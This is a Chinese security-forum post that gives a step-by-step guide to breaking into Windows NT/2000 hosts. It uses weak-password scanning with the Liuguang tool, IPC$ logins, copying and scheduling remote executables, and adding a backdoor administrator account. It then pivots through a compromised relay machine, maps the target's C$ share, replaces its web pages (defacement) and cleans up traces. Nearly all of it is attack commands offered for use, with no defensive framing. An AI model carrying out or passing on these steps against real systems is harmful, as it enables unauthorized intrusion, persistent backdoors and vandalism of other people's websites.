|
 | 作者: jianphu [jianphu]
 论坛用户 |
登录 |
| 我先说一说入侵的过程,入侵用到的工具只是流光2001,系统是WIN2000。 1、先找台肉机,用流光进行NT/98扫描,对扫到的主机进行IPC登录,即使是简单测试,都可以试出很多主机的用户和密码。(OK,现在找到一个用户名与密码相同的肉机,当然是要有admin权限的用户了) 2、回到系统,在“命令提示符”下,IPC登录: net use \\ip\ipc$ "password" /user:username 把流光TOOLS目录中的SRV.EXE 与 NTLM.EXE拷贝到肉机 copy srv.exe \\ip\admin$\system32 copy ntlm.exe \\ip\admin$\system32 net time \\ip #查看肉机当前时间 at \\ip time srv.exe #用AT命令执行SRV.EXE,这里的时间要比查看的时间晚两分钟左右,可以用AT \\IP 来查看指定执行命令的状况 等几分钟,命令执行完成,telnet xxx.xxx.xxx.xxx 99 登录成功。要做如下事: c:\net user newboys 12345 /add #添加名叫newboys的用户,密码为12345 c:\net localgroup administrators newboys /add #把newboys用户放入管理员组中(成超级用户了^&^) c:\ntlm #运行刚拷到肉机上的ntlm.exe,其作用是把telnet变为明文传输。(流光2001中是这么说的) 运行完NTLM.EXE 后,用EXIT 断开连接。 回到命令提示符下: 利用TOOLS目录中的NETSVC.EXE中断肉机TELNET服务 netsvc \\ip telnet /stop #关闭指定ip的telnet服务 netsvc \\ip telnet /start #打开指定ip的telnet服务 其实如果指定ip以前未开telnet服务直接打"netsvc \\ip telnet /start"就行了。 现在登录: telnet \\ip 登录到了肉机,在这种状态下,再利用IPC登录,登录目标主机.(目标机的用户名和密码同样是用流光获得的,当然也是admin权限的用户啦) net use \\ip\ipc$ "password"/user:username net use x: \\ip\c$ 将他的c盘映射到本地的X盘,(因为一般默认目录在c盘下面,默认存放网页的路径是 c:\inetpub\wwwroot) 把你事先准备好的网页拷到其web目录中,整个黑网站的过程就此算完成了一大半了。最后是清理战场,把拷到肉机上的东东全删了。exit后黑网站的全过程结束。 |
| 地主 发表时间: 06/21 17:52 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 简单入侵NT主机